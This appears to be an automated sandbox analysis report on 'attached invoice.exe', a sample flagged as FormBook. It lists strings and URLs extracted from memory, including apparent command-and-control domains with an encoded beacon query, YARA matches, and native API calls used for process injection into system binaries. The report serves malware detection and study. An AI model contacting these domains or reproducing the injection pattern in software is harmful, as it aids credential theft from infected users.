3e 0a 09 09 3c 73 74 79 6c 65 3e 0a 09 09 09 2a 20 7b 0a 09 09 09 09 6d 61 72 67 69 6e 3a 20 30 3b 0a 09 09 09 09 70 61 64 64 69 6e 67 3a 20 30 3b 0a 09 09 09 09 62 6f 78 2d 73 69 7a 69 6e 67 3a 20 62 6f 72 64 65 72 2d 62 6f 78 3b 0a 09 09 09 7d 0a 09 09 09 68 74 6d 6c 20 7b 0a 09 09 09 09 68 65 69 67 68 74 3a 20 31 30 30 25 3b 0a 09 09 09 7d 0a 09 09 09 62 6f 64 79 20 7b 0a 09 09 09 09 68 65 69 67 68 74 3a 20 31 30 30 25 3b 0a 09 09 09 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 34 70 78 3b 0a 09 09 09 7d 0a 09 09 09 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 09 09 09 09 64 69 73 70 6c 61 79 3a 20 66 6c 65 78 3b 0a 09 09 09 09 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 20 63 6f 6c 75 6d 6e 3b 0a 09 09 09 09 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 20 63 65 6e 74 65 72 3b 0a 09 09 09 09 68 65 69 67 68 74 3a 20 31 30 30 25 3b 0a 09 09 09 09 70 61 64 64 69 6e 67 2d 74 6f 70 3a 20 31 32 25 3b 0a 09 09 09 7d 0a 09 09 09 2e 6c 6f 67 6f 20 69 6d 67 20 7b 0a 09 09 09 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0a 09 09 09 20 20 20 20 77 69 64 74 68 3a 20 31 30 30 70 78 3b 0a 09 09 09 7d 0a 09 09 09 2e 6c 6f 67 6f 20 69 6d 67 20 2b 20 69 6d 67 20 7b 0a 09 09 09 20 20 20 20 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 31 32 70 78 3b 0a 09 09 09 7d 0a 09 09 09 2e 74 69 74 6c 65 20 7b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 32 34 70 78 3b 0a 09 09 09 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 31 30 70 78 3b 0a 09 09 09 09 63 6f 6c 6f 72 3a 20 23 33 33 33 3b 0a 09 09 09 09 6c 65 74 74 65 72 2d 73 70 61 63 69 6e 67 3a 20 31 30 70 78 3b 0a 09 09 09 7d 0a 09 09 09 2e 64 65 73 63 20 7b 0a 09 09 09 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 36 70 78 3b 0a 09 09 09 09 63 6f 6c 6f 72 3a 20 23 37 37 37 3b 0a 09 09 09 09 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 09 09 09 09 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 32 34 70 78 3b 0a 09 09 09 7d 0a 09 09 09 2e 66 6f 6f 74 65 72 20 7b 0a 09 09 09 09 2f 2a 20 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0a 09 09 09 09 6c 65 66 74 3a 20 30 3b 0a 09 09 09 09 62 6f 74 74 6f 6d 3a 20 33 32 70 78 3b 0a 09 09 09 09 77 69 64 74 68 3a 20 31 30 30 25 3b 20 2a 2f 0a 09 09 09 09 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 32 34 70 78 3b 0a 09 09 09 09 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 09 09 09 09 66 6f
                Source: firefox.exe, 00000007.00000003.811979460902.0000014047E98000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://c.pki.goog/r/r1.crl0
                Source: firefox.exe, 00000007.00000003.811979460902.0000014047E98000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
                Source: firefox.exe, 00000007.00000003.811979460902.0000014047E98000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
                Source: firefox.exe, 00000007.00000003.811979460902.0000014047E98000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
                Source: firefox.exe, 00000007.00000003.811979460902.0000014047E98000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
                Source: firefox.exe, 00000007.00000003.811979460902.0000014047E98000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
                Source: firefox.exe, 00000007.00000003.811979460902.0000014047E98000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
                Source: firefox.exe, 00000007.00000003.811979460902.0000014047E98000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
                Source: firefox.exe, 00000007.00000003.811979460902.0000014047E98000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://i.pki.goog/r1.crt0
                Source: RAVCpl64.exe, 00000005.00000002.816303830162.000000000766C000.00000004.80000000.00040000.00000000.sdmp, cacls.exe, 00000006.00000002.815529240346.00000000033DC000.00000004.10000000.00040000.00000000.sdmp, firefox.exe, 00000007.00000002.812027451114.000000000606C000.00000004.80000000.00040000.00000000.sdmp, attached invoice.exeString found in binary or memory: http://localhost/arkanoid_server/requests.php
                Source: firefox.exe, 00000007.00000003.811979460902.0000014047E98000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
                Source: firefox.exe, 00000007.00000003.811979460902.0000014047E98000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
                Source: RAVCpl64.exe, 00000005.00000002.816281337320.00000000007E2000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.kmmm759j.sbs
                Source: RAVCpl64.exe, 00000005.00000002.816281337320.00000000007E2000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.kmmm759j.sbs/vz2d/
                Source: cacls.exe, 00000006.00000002.815529240346.0000000004A9C000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://www.seeseye.website/ebz6/?6aonl5x=ltBLGn0Efq89ywdxazFnC/iK0X6aQYXjeGKHuPrIcw8TaFewa5HLzA
                Source: firefox.exe, 00000007.00000003.811979460902.0000014047E98000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.c.lencr.org/0
                Source: firefox.exe, 00000007.00000003.811979460902.0000014047E98000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.i.lencr.org/0
                Source: cacls.exe, 00000006.00000003.811921202646.00000000075B8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                Source: cacls.exe, 00000006.00000003.811921202646.00000000075B8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                Source: RAVCpl64.exe, 00000005.00000002.816303830162.0000000007F0A000.00000004.80000000.00040000.00000000.sdmp, cacls.exe, 00000006.00000002.815529240346.0000000003C7A000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://codepen.io/uzcho_/pen/eYdmdXw.css
                Source: RAVCpl64.exe, 00000005.00000002.816303830162.0000000007F0A000.00000004.80000000.00040000.00000000.sdmp, cacls.exe, 00000006.00000002.815529240346.0000000003C7A000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://codepen.io/uzcho_/pens/popular/?grid_type=list
                Source: cacls.exe, 00000006.00000003.811921202646.00000000075B8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                Source: cacls.exe, 00000006.00000003.811921202646.00000000075B8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                Source: cacls.exe, 00000006.00000003.811921202646.00000000075B8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                Source: cacls.exe, 00000006.00000003.811921202646.00000000075B8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gemini.google.com/app?q=
                Source: cacls.exe, 00000006.00000003.811913703751.0000000007596000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://odc.officeapps.live.com/odc/v2.1/hrd
                Source: cacls.exe, 00000006.00000002.815525437052.000000000280E000.00000004.00000020.00020000.00000000.sdmp, cacls.exe, 00000006.00000002.815525437052.00000000027E2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://odc.officeapps.live.com/odc/v2.1/hrd?lcid=1033&syslcid=2057&uilcid=1033&app=1&ver=16&build=1
                Source: cacls.exe, 00000006.00000002.815525437052.000000000280E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://odc.officeapps.live.com/odc/v2.1/hrdlcid=1033&syslcid=2057&uilcid=1033&app=1&ver=16&build=16
                Source: cacls.exe, 00000006.00000003.811921202646.00000000075B8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://uk.search.yahoo.com/favicon.icohttps://uk.search.yahoo.com/search
                Source: cacls.exe, 00000006.00000003.811921202646.00000000075B8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://uk.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                Source: RAVCpl64.exe, 00000005.00000002.816303830162.00000000086E4000.00000004.80000000.00040000.00000000.sdmp, RAVCpl64.exe, 00000005.00000002.816303830162.00000000083C0000.00000004.80000000.00040000.00000000.sdmp, RAVCpl64.exe, 00000005.00000002.816303830162.000000000822E000.00000004.80000000.00040000.00000000.sdmp, cacls.exe, 00000006.00000002.815529240346.0000000004130000.00000004.10000000.00040000.00000000.sdmp, cacls.exe, 00000006.00000002.815529240346.0000000003F9E000.00000004.10000000.00040000.00000000.sdmp, cacls.exe, 00000006.00000002.815529240346.0000000004454000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://www.aapanel.com/new/download.html?invite_code=aapanele
                Source: RAVCpl64.exe, 00000005.00000002.816303830162.00000000091E2000.00000004.80000000.00040000.00000000.sdmp, cacls.exe, 00000006.00000002.815529240346.0000000004F52000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://www.domainnameshop.com/
                Source: cacls.exe, 00000006.00000002.815529240346.0000000004F52000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://www.domainnameshop.com/whois
                Source: RAVCpl64.exe, 00000005.00000002.816303830162.00000000091E2000.00000004.80000000.00040000.00000000.sdmp, cacls.exe, 00000006.00000002.815529240346.0000000004F52000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://www.domeneshop.no/whois
                Source: cacls.exe, 00000006.00000002.815529240346.0000000004DC0000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://www.dymar.shop
                Source: RAVCpl64.exe, 00000005.00000002.816303830162.0000000009050000.00000004.80000000.00040000.00000000.sdmp, cacls.exe, 00000006.00000002.815529240346.0000000004DC0000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://www.dymar.shop/
                Source: RAVCpl64.exe, 00000005.00000002.816303830162.0000000009050000.00000004.80000000.00040000.00000000.sdmp, cacls.exe, 00000006.00000002.815529240346.0000000004DC0000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://www.dymar.shop/image/cache/catalog/DYMAR%20250-300x300.jpg
                Source: RAVCpl64.exe, 00000005.00000002.816303830162.0000000009050000.00000004.80000000.00040000.00000000.sdmp, cacls.exe, 00000006.00000002.815529240346.0000000004DC0000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://www.dymar.shop/image/catalog/DYMAR
                Source: RAVCpl64.exe, 00000005.00000002.816303830162.0000000009050000.00000004.80000000.00040000.00000000.sdmp, cacls.exe, 00000006.00000002.815529240346.0000000004DC0000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://www.dymar.shop/image/catalog/favicon.png
                Source: cacls.exe, 00000006.00000002.815529240346.0000000004DC0000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://www.dymar.shop/index.php?route=account/account
                Source: RAVCpl64.exe, 00000005.00000002.816303830162.0000000009050000.00000004.80000000.00040000.00000000.sdmp, cacls.exe, 00000006.00000002.815529240346.0000000004DC0000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://www.dymar.shop/index.php?route=account/login
                Source: RAVCpl64.exe, 00000005.00000002.816303830162.0000000009050000.00000004.80000000.00040000.00000000.sdmp, cacls.exe, 00000006.00000002.815529240346.0000000004DC0000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://www.dymar.shop/index.php?route=account/newsletter
                Source: RAVCpl64.exe, 00000005.00000002.816303830162.0000000009050000.00000004.80000000.00040000.00000000.sdmp, cacls.exe, 00000006.00000002.815529240346.0000000004DC0000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://www.dymar.shop/index.php?route=account/order
                Source: RAVCpl64.exe, 00000005.00000002.816303830162.0000000009050000.00000004.80000000.00040000.00000000.sdmp, cacls.exe, 00000006.00000002.815529240346.0000000004DC0000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://www.dymar.shop/index.php?route=account/register
                Source: RAVCpl64.exe, 00000005.00000002.816303830162.0000000009050000.00000004.80000000.00040000.00000000.sdmp, cacls.exe, 00000006.00000002.815529240346.0000000004DC0000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://www.dymar.shop/index.php?route=account/return/add
                Source: RAVCpl64.exe, 00000005.00000002.816303830162.0000000009050000.00000004.80000000.00040000.00000000.sdmp, cacls.exe, 00000006.00000002.815529240346.0000000004DC0000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://www.dymar.shop/index.php?route=account/voucher
                Source: cacls.exe, 00000006.00000002.815529240346.0000000004DC0000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://www.dymar.shop/index.php?route=account/wishlist
                Source: RAVCpl64.exe, 00000005.00000002.816303830162.0000000009050000.00000004.80000000.00040000.00000000.sdmp, cacls.exe, 00000006.00000002.815529240346.0000000004DC0000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://www.dymar.shop/index.php?route=affiliate/login
                Source: RAVCpl64.exe, 00000005.00000002.816303830162.0000000009050000.00000004.80000000.00040000.00000000.sdmp, cacls.exe, 00000006.00000002.815529240346.0000000004DC0000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://www.dymar.shop/index.php?route=common/currency/currency
                Source: RAVCpl64.exe, 00000005.00000002.816303830162.0000000009050000.00000004.80000000.00040000.00000000.sdmp, cacls.exe, 00000006.00000002.815529240346.0000000004DC0000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://www.dymar.shop/index.php?route=common/language/language
                Source: cacls.exe, 00000006.00000002.815529240346.0000000004DC0000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://www.dymar.shop/index.php?route=error/not_found&amp;6aonl5x=lPVxR6/rWOJUAmNkBdPYmYT9z/j33Ol
                Source: cacls.exe, 00000006.00000002.815529240346.0000000004DC0000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://www.dymar.shop/index.php?route=information/contact
                Source: RAVCpl64.exe, 00000005.00000002.816303830162.0000000009050000.00000004.80000000.00040000.00000000.sdmp, cacls.exe, 00000006.00000002.815529240346.0000000004DC0000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://www.dymar.shop/index.php?route=information/sitemap
                Source: RAVCpl64.exe, 00000005.00000002.816303830162.0000000009050000.00000004.80000000.00040000.00000000.sdmp, cacls.exe, 00000006.00000002.815529240346.0000000004DC0000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://www.dymar.shop/index.php?route=product/compare
                Source: RAVCpl64.exe, 00000005.00000002.816303830162.0000000009050000.00000004.80000000.00040000.00000000.sdmp, cacls.exe, 00000006.00000002.815529240346.0000000004DC0000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://www.dymar.shop/index.php?route=product/manufacturer
                Source: RAVCpl64.exe, 00000005.00000002.816303830162.0000000009050000.00000004.80000000.00040000.00000000.sdmp, cacls.exe, 00000006.00000002.815529240346.0000000004DC0000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://www.dymar.shop/index.php?route=product/special
                Source: RAVCpl64.exe, 00000005.00000002.816303830162.0000000009050000.00000004.80000000.00040000.00000000.sdmp, cacls.exe, 00000006.00000002.815529240346.0000000004DC0000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://www.dymar.shop/informaciya-o-dostavke
                Source: RAVCpl64.exe, 00000005.00000002.816303830162.0000000009050000.00000004.80000000.00040000.00000000.sdmp, cacls.exe, 00000006.00000002.815529240346.0000000004DC0000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://www.dymar.shop/o-nas
                Source: RAVCpl64.exe, 00000005.00000002.816303830162.0000000009050000.00000004.80000000.00040000.00000000.sdmp, cacls.exe, 00000006.00000002.815529240346.0000000004DC0000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://www.dymar.shop/politika-bezopasnosti
                Source: RAVCpl64.exe, 00000005.00000002.816303830162.0000000009050000.00000004.80000000.00040000.00000000.sdmp, cacls.exe, 00000006.00000002.815529240346.0000000004DC0000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://www.dymar.shop/usloviya-soglasheniya
                Source: cacls.exe, 00000006.00000003.811921202646.00000000075B8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
                Source: cacls.exe, 00000006.00000003.811921202646.00000000075B8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/favicon.ico
                Source: RAVCpl64.exe, 00000005.00000002.816303830162.0000000009050000.00000004.80000000.00040000.00000000.sdmp, cacls.exe, 00000006.00000002.815529240346.0000000004DC0000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://www.googletagmanager.com/gtag/js?id=G-0V86MNJQXC
                Source: RAVCpl64.exe, 00000005.00000002.816303830162.0000000008B9A000.00000004.80000000.00040000.00000000.sdmp, cacls.exe, 00000006.00000002.815529240346.000000000490A000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://www.hostgator.com.br

                E-Banking Fraud

                barindex
                Yara detected FormBook
                Source: Yara matchFile source: 4.2.attached invoice.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 4.2.attached invoice.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000006.00000002.815527565060.00000000029C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.811737594560.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.815527779212.0000000002A60000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.811798316588.0000000006CB0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

                System Summary

                barindex
                Initial sample is a PE file and has a suspicious name
                Source: initial sampleStatic PE information: Filename: attached invoice.exe
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_0042CE23 NtClose,4_2_0042CE23
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_01922B90 NtFreeVirtualMemory,LdrInitializeThunk,4_2_01922B90
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_01922BC0 NtQueryInformationToken,LdrInitializeThunk,4_2_01922BC0
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_01922A80 NtClose,LdrInitializeThunk,4_2_01922A80
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_01922D10 NtQuerySystemInformation,LdrInitializeThunk,4_2_01922D10
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_01922EB0 NtProtectVirtualMemory,LdrInitializeThunk,4_2_01922EB0
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_019234E0 NtCreateMutant,LdrInitializeThunk,4_2_019234E0
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_01924260 NtSetContextThread,4_2_01924260
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_01924570 NtSuspendThread,4_2_01924570
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_019229D0 NtWaitForSingleObject,4_2_019229D0
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_019229F0 NtReadFile,4_2_019229F0
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_01922B80 NtCreateKey,4_2_01922B80
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_01922BE0 NtQueryVirtualMemory,4_2_01922BE0
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_01922B10 NtAllocateVirtualMemory,4_2_01922B10
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_01922B00 NtQueryValueKey,4_2_01922B00
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_01922B20 NtQueryInformationProcess,4_2_01922B20
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_01922AA0 NtQueryInformationFile,4_2_01922AA0
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_01922AC0 NtEnumerateValueKey,4_2_01922AC0
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_01922A10 NtWriteFile,4_2_01922A10
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_01922DA0 NtReadVirtualMemory,4_2_01922DA0
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_01922DC0 NtAdjustPrivilegesToken,4_2_01922DC0
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_01922D50 NtWriteVirtualMemory,4_2_01922D50
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_01922CD0 NtEnumerateKey,4_2_01922CD0
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_01922CF0 NtDelayExecution,4_2_01922CF0
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_01922C10 NtOpenProcess,4_2_01922C10
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_01922C30 NtMapViewOfSection,4_2_01922C30
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_01922C20 NtSetInformationFile,4_2_01922C20
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_01922C50 NtUnmapViewOfSection,4_2_01922C50
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_01922FB0 NtSetValueKey,4_2_01922FB0
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_01922F00 NtCreateFile,4_2_01922F00
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_01922F30 NtOpenDirectoryObject,4_2_01922F30
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_01922E80 NtCreateProcessEx,4_2_01922E80
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_01922ED0 NtResumeThread,4_2_01922ED0
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_01922EC0 NtQuerySection,4_2_01922EC0
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_01922E00 NtQueueApcThread,4_2_01922E00
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_01922E50 NtCreateSection,4_2_01922E50
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_019238D0 NtGetContextThread,4_2_019238D0
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_01923C90 NtOpenThread,4_2_01923C90
                Source: C:\Users\user\Desktop\attached invoice.exeCode function: 4_2_01923C30 NtOpenProcessToken,4_2_01923C30
                Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeCode function: 5_2_046D40D6 SleepEx,NtResumeThread,5_2_046D40D6
                Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeCode function: 5_2_046D3F45 SleepEx,NtCreateSection,5_2_046D3F45
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 6_2_02E22AC0 NtEnumerateValueKey,LdrInitializeThunk,6_2_02E22AC0
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 6_2_02E22A80 NtClose,LdrInitializeThunk,6_2_02E22A80
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 6_2_02E22A10 NtWriteFile,LdrInitializeThunk,6_2_02E22A10
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 6_2_02E22BC0 NtQueryInformationToken,LdrInitializeThunk,6_2_02E22BC0
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 6_2_02E22B80 NtCreateKey,LdrInitializeThunk,6_2_02E22B80
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 6_2_02E22B90 NtFreeVirtualMemory,LdrInitializeThunk,6_2_02E22B90
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 6_2_02E22B00 NtQueryValueKey,LdrInitializeThunk,6_2_02E22B00
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 6_2_02E22B10 NtAllocateVirtualMemory,LdrInitializeThunk,6_2_02E22B10
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 6_2_02E229F0 NtReadFile,LdrInitializeThunk,6_2_02E229F0
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 6_2_02E22E50 NtCreateSection,LdrInitializeThunk,6_2_02E22E50
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 6_2_02E22F00 NtCreateFile,LdrInitializeThunk,6_2_02E22F00
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 6_2_02E22CF0 NtDelayExecution,LdrInitializeThunk,6_2_02E22CF0
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 6_2_02E22C30 NtMapViewOfSection,LdrInitializeThunk,6_2_02E22C30
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 6_2_02E22D10 NtQuerySystemInformation,LdrInitializeThunk,6_2_02E22D10
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 6_2_02E234E0 NtCreateMutant,LdrInitializeThunk,6_2_02E234E0
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 6_2_02E24260 NtSetContextThread,6_2_02E24260
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 6_2_02E24570 NtSuspendThread,6_2_02E24570
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 6_2_02E22AA0 NtQueryInformationFile,6_2_02E22AA0
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 6_2_02E22BE0 NtQueryVirtualMemory,6_2_02E22BE0
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 6_2_02E22B20 NtQueryInformationProcess,6_2_02E22B20
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 6_2_02E229D0 NtWaitForSingleObject,6_2_02E229D0
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 6_2_02E22EC0 NtQuerySection,6_2_02E22EC0
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 6_2_02E22ED0 NtResumeThread,6_2_02E22ED0
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 6_2_02E22EB0 NtProtectVirtualMemory,6_2_02E22EB0
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 6_2_02E22E80 NtCreateProcessEx,6_2_02E22E80
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 6_2_02E22E00 NtQueueApcThread,6_2_02E22E00
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 6_2_02E22FB0 NtSetValueKey,6_2_02E22FB0
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 6_2_02E22F30 NtOpenDirectoryObject,6_2_02E22F30
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 6_2_02E22CD0 NtEnumerateKey,6_2_02E22CD0
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 6_2_02E22C50 NtUnmapViewOfSection,6_2_02E22C50
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 6_2_02E22C20 NtSetInformationFile,6_2_02E22C20
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 6_2_02E22C10 NtOpenProcess,6_2_02E22C10
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 6_2_02E22DC0 NtAdjustPrivilegesToken,6_2_02E22DC0
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 6_2_02E22DA0 NtReadVirtualMemory,6_2_02E22DA0
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 6_2_02E22D50 NtWriteVirtualMemory,6_2_02E22D50
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 6_2_02E238D0 NtGetContextThread,6_2_02E238D0
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 6_2_02E23C90 NtOpenThread,6_2_02E23C90
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 6_2_02E23C30 NtOpenProcessToken,6_2_02E23C30
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 6_2_02B6EF5A NtQueryInformationProcess,NtReadVirtualMemory,6_2_02B6EF5A
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 6_2_02B737F8 NtSuspendThread,6_2_02B737F8
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 6_2_02B734D8 NtSetContextThread,6_2_02B734D8
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 6_2_02B74528 NtMapViewOfSection,6_2_02B74528
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 6_2_02B6FA6C NtSetContextThread,6_2_02B6FA6C
